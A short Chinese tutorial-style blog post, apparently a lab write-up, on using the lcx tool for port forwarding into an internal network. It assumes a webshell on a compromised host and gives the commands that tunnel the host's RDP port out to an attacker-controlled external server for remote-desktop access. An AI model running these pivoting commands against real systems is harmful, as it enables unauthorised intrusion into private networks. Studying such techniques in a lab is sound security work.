【端口转发】利用lcx进行访问内网

0x01 前言

这周开始准备学习内网渗透的知识，昨天利用Vmware搭建了域环境，今天做了一个小实验，利用lcx端口转发来访问内网服务器。这里需要一个外网ip，所以去阿里云买了一个服务器，学生价9.9一个月还是挺不错的~

0x02 操作环境

内网服务器ip：192.168.80.3 端口3389
外网ip：x.x.x.x 端口：51（这里需要注意的是购买阿里云服务器之后一定要在安全组里定义一个开放入口的端口，否则的话是连接不到的，我就被坑了很久。。）

0x03 具体步骤

首先这里假设已经拿到了服务器的webshell了，那么就上传一个lcx.exe到肉鸡上，在终端输入

lcx.exe -slave x.x.x.x 51 192.168.80.3 3389

这里意思就是将内网192.168.80.3的3389端口转发到外网x.x.x.x的51端口

然后再本机上（注意这里本机需要外网ip，否则会失败）的终端输入

lcx.exe -listen 51 10000

这里意思是在本机上监听51端口并连接到10000端口（可以用别的端口）
本机需要10000端口是没有被其他程序使用的，可以使用命令：

netstat -an

查看

最后win+R，输入mstsc打开远程桌面，输入127.0.0.1:10000就可以连接到肉鸡了~~

P.S 要有一个需要注意的是，做实验的时候，肉鸡记得把远程桌面功能打开呀！

0x04 参考文献

http://www.freebuf.com/sectool/126967.html